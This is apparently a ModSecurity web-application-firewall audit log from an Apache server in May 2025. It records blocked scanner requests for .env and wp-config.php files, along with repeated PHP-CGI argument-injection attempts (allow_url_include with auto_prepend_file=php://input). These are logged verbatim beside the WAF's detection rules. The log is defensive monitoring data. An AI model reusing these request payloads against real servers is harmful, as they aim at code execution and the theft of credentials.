"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746197383813190 859 (- - -) Stopwatch2: 1746197383813190 859; combined=350, p1=306, p2=0, p3=0, p4=0, p5=44, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --064c2c43-Z-- --80fdef48-A-- [02/May/2025:22:37:07 +0700] aBTmo_NNWdC6CAybkqMQdQAAAM4 103.236.140.4 36652 103.236.140.4 8181 --80fdef48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.231.75.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.231.75.61 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --80fdef48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80fdef48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746200227587268 831 (- - -) Stopwatch2: 1746200227587268 831; combined=345, p1=302, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80fdef48-Z-- --d316625f-A-- [02/May/2025:22:37:08 +0700] aBTmpBXwRgnphTBdhpRpzwAAAIE 103.236.140.4 36654 103.236.140.4 8181 --d316625f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.231.75.61 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.231.75.61 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.32.3 Accept: */* --d316625f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d316625f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746200228498237 738 (- - -) Stopwatch2: 1746200228498237 738; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d316625f-Z-- --605df467-A-- [02/May/2025:23:06:54 +0700] aBTtnhXwRgnphTBdhpRqAQAAAIw 103.236.140.4 37062 103.236.140.4 8181 --605df467-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 139.59.132.8 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --605df467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --605df467-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746202014131153 946 (- - -) Stopwatch2: 1746202014131153 946; combined=354, p1=303, p2=0, p3=0, p4=0, p5=50, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --605df467-Z-- --751fbe37-A-- [02/May/2025:23:13:10 +0700] aBTvFhXwRgnphTBdhpRqCgAAAJQ 103.236.140.4 37136 103.236.140.4 8181 --751fbe37-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --751fbe37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --751fbe37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746202390135194 739 (- - -) Stopwatch2: 1746202390135194 739; combined=308, p1=276, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --751fbe37-Z-- --63e4e95b-A-- [02/May/2025:23:20:53 +0700] aBTw5RXwRgnphTBdhpRqGwAAAI0 103.236.140.4 37252 103.236.140.4 8181 --63e4e95b-B-- GET /admin/config.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 87.106.86.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 87.106.86.89 X-Forwarded-Proto: http Connection: close User-Agent: Accept: */* --63e4e95b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --63e4e95b-H-- Message: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "120"] [id "217240"] [rev "3"] [msg "COMODO WAF: Empty User Agent Header||103.236.140.4|F|5"] [data "REQUEST_HEADERS:User-Agent="] [severity "NOTICE"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746202853796375 4057 (- - -) Stopwatch2: 1746202853796375 4057; combined=2512, p1=427, p2=1988, p3=31, p4=37, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63e4e95b-Z-- --57ffbb64-A-- [02/May/2025:23:40:27 +0700] aBT1exXwRgnphTBdhpRqQgAAAIY 103.236.140.4 37408 103.236.140.4 8181 --57ffbb64-B-- POST /vpnsvc/connect.cgi HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 85.90.246.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 85.90.246.159 X-Forwarded-Proto: https Connection: close Content-Length: 1684 Content-Type: image/jpeg X-SSL-VPN: 1 --57ffbb64-C-- GIF89aÈ3ò674yhT€€€¯[³¨ÕÕÔÿÿÿ,È3þÜ4 Ake1O€ù`(Ždižhª®lëšKã %oV§éÒëÿÀ pÈŠÜ,œÆÇ1f$¢tJ­N± aË%Ô¸I汚Ïèô+t …xü nŸê5ï)j, n\rˆzzoMw%qq/’•€"H}˜š|‚#kHp#}˜¨!‡‰µ‹|{<Ž#ž›®+­ ¦¬›±Ã!±ž"ž®Å™ –¯Æ p¶¶[Že!½›Ë*žËÁáѧ©néÖ‚ÍÉÊÕÑ®½Ë¬´Ùs47vß<ÈšBN8L« úêR Û5ÓóÎÙ,r·@"èþ°aÇOì@~”öP6ƒ¨jyùwã(iU gŠ©RÅPqB‚1Ú´Vq¼ò'I>ïq þH6]$Á©°iêpì´Æ&ÙE Œ ,Ðv*-µà¾š¤!¹ GnŸµÚê(±%ˆTÒ˜Õ§ 1ö%3JHŸ€4¦ tV¡¯m'ALy¡._ªgïÓ0¼ð½îÞë0Wó6L¿[¼o—›±± YÈ0œÈÛhšê +pqdz’q¾g<ñWøÂlÄî²'3¼:Ã,/ÄìŒ%ñ»ý~²Ä‘[2TF·òÌÏqÄ@ƒò0Æú’’5ÃSC‡_שpÝ°ÎbWmö˜M‹<2Ò䦊°_OËuÌeW½/ÙC;ìõÄùjírË6¿,¸b~Ÿ-øi‡±ö?kª šÂ|·û÷àcþÇ'5ÝÓm6ÔrSùÔÛøè$,°D,™ÞmšïzËž»5éyË9éðŽ­{؆S È¿ sn€9œ'r:´ívë^ÃDøMñî ØÍz÷ýÐïãýõ`½³Ï¢ã¹¦Ÿn| è`-´ìNw¸|œñØ`nh/ hT*Kþ>üjÊW¿Ð˜+ ù€!nÕ::0 ´Žà#Hðg Ü÷Þõ?ùy)R|`p7»µÀî}!”B Eè±Ø¹nkàš Y–µœÙPl¾;JçX( &xaëYä~ø¹Ýᬈe«3 Æ·«˜ Ù3ÅÀÙ­Up;\â¡'»¼os¶Óœa':Ài„—s¢ƒ¸;ª ñ‹PâÏØÃ4–†ƒ«!½7CÎN‡ã£c¸V(ÈB‚°h†L¤"ÉÈF:ò‘Œ¤$u•;Spxæ×Q=chõf§ †ä†Mõ¥¨Ž‚=O„ºfò¶Cíø¸ü; Ð{[ö3½¢p¬¹û‹]qmû+èÛNQ®8ú€²¶9 ðN2–'ÉÕc¹ÈÅ‚)To7}ý(šª!=@Ó‚vºº;3 c^åqi„u\(VcĤùN½µ=÷!q{¤–ïÝBMéZÁ¹Âð—¹m“>“GP ±*+´‘Åø·kšx·ÀºØ|ª3Ž.iˆÐñqÉTÿ˜ý¶ž0 *çÕ0ZqÕ´´è…R¬ ß~_‰ŒÅECE¿‹E-vÎóaøÈÙH0%¢â›µlúDjNÄÆsvq&š0ÇàÕ BÄfM:Ã÷ --57ffbb64-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ffbb64-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=image/jpeg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746204027723871 4707 (- - -) Stopwatch2: 1746204027723871 4707; combined=2915, p1=587, p2=2219, p3=35, p4=42, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ffbb64-Z-- --c6527261-A-- [03/May/2025:00:13:00 +0700] aBT9HBXwRgnphTBdhpRqzQAAAIQ 103.236.140.4 38016 103.236.140.4 8181 --c6527261-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 Accept-Charset: utf-8 --c6527261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6527261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746205980636541 755 (- - -) Stopwatch2: 1746205980636541 755; combined=302, p1=269, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6527261-Z-- --9ed42e48-A-- [03/May/2025:00:41:12 +0700] aBUDuPNNWdC6CAybkqMRFQAAAMo 103.236.140.4 38208 103.236.140.4 8181 --9ed42e48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.244.161.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.244.161.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9ed42e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ed42e48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746207672744259 901 (- - -) Stopwatch2: 1746207672744259 901; combined=347, p1=306, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ed42e48-Z-- --10f27300-A-- [03/May/2025:05:03:54 +0700] aBVBSkSOhfQ6W15Bgg_8HgAAAEY 103.236.140.4 49202 103.236.140.4 8181 --10f27300-B-- GET /admin/config.php HTTP/1.0 Host: 0.0.0.0 X-Real-IP: 188.166.16.179 X-Forwarded-Host: 0.0.0.0 X-Forwarded-Server: 0.0.0.0 X-Forwarded-For: 188.166.16.179 X-Forwarded-Proto: https Connection: close User-Agent: Accept: */* --10f27300-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --10f27300-H-- Message: Warning. Pattern match "^$" at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "120"] [id "217240"] [rev "3"] [msg "COMODO WAF: Empty User Agent Header||0.0.0.0|F|5"] [data "REQUEST_HEADERS:User-Agent="] [severity "NOTICE"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1746223434970494 4760 (- - -) Stopwatch2: 1746223434970494 4760; combined=2902, p1=449, p2=2340, p3=40, p4=42, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10f27300-Z-- --11da5a6c-A-- [03/May/2025:05:08:16 +0700] aBVCUMP0ZqGY3Jj2X92H7wAAAAk 103.236.140.4 49236 103.236.140.4 8181 --11da5a6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.39.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.39.120 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --11da5a6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11da5a6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746223696225743 961 (- - -) Stopwatch2: 1746223696225743 961; combined=393, p1=351, p2=0, p3=0, p4=0, p5=42, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11da5a6c-Z-- --cd38d963-A-- [03/May/2025:09:07:04 +0700] aBV6SESOhfQ6W15Bgg_-GAAAAEQ 103.236.140.4 53842 103.236.140.4 8181 --cd38d963-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 94.152.13.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.152.13.32 X-Forwarded-Proto: http Connection: close Accept: */* --cd38d963-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd38d963-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746238024073086 836 (- - -) Stopwatch2: 1746238024073086 836; combined=328, p1=286, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd38d963-Z-- --fd8c4375-A-- [03/May/2025:09:13:38 +0700] aBV70sP0ZqGY3Jj2X92KMAAAAAM 103.236.140.4 53894 103.236.140.4 8181 --fd8c4375-B-- GET /wp-config.php.bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 146.190.86.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 146.190.86.222 X-Forwarded-Proto: http Connection: close Accept: */* --fd8c4375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd8c4375-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746238418434193 880 (- - -) Stopwatch2: 1746238418434193 880; combined=320, p1=278, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd8c4375-Z-- --7cb86b20-A-- [03/May/2025:12:10:25 +0700] aBWlQcP0ZqGY3Jj2X92NCwAAAAk 103.236.140.4 33210 103.236.140.4 8181 --7cb86b20-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.172.239.60 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.172.239.60 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --7cb86b20-C-- --7cb86b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb86b20-E-- --7cb86b20-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746249025414482 4777 (- - -) Stopwatch2: 1746249025414482 4777; combined=3035, p1=546, p2=2452, p3=0, p4=0, p5=37, sr=141, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb86b20-Z-- --8553ea48-A-- [03/May/2025:12:38:30 +0700] aBWr1oOgvPi2IO4kz1vsFgAAAJM 103.236.140.4 33896 103.236.140.4 8181 --8553ea48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.39.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.39.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8553ea48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8553ea48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746250710849750 849 (- - -) Stopwatch2: 1746250710849750 849; combined=376, p1=338, p2=0, p3=0, p4=0, p5=38, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8553ea48-Z-- --ed6fa66d-A-- [03/May/2025:15:26:37 +0700] aBXTPcP0ZqGY3Jj2X92O8gAAAAo 103.236.140.4 38480 103.236.140.4 8181 --ed6fa66d-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.65.202.153 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 159.65.202.153 Accept-Encoding: gzip X-Varnish: 142236315 --ed6fa66d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ed6fa66d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746260797532121 843 (- - -) Stopwatch2: 1746260797532121 843; combined=381, p1=347, p2=0, p3=0, p4=0, p5=34, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed6fa66d-Z-- --e862714a-A-- [03/May/2025:15:58:44 +0700] aBXaxESOhfQ6W15Bgg8C_QAAAFg 103.236.140.4 41330 103.236.140.4 8181 --e862714a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 188.128.39.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 188.128.39.37 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --e862714a-C-- --e862714a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e862714a-E-- --e862714a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746262724379002 4133 (- - -) Stopwatch2: 1746262724379002 4133; combined=2830, p1=467, p2=2331, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e862714a-Z-- --f65a2b3a-A-- [03/May/2025:16:11:21 +0700] aBXducP0ZqGY3Jj2X92Q_AAAABI 103.236.140.4 43596 103.236.140.4 8181 --f65a2b3a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --f65a2b3a-C-- --f65a2b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f65a2b3a-E-- --f65a2b3a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746263481762905 4120 (- - -) Stopwatch2: 1746263481762905 4120; combined=2438, p1=469, p2=1940, p3=0, p4=0, p5=29, sr=107, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 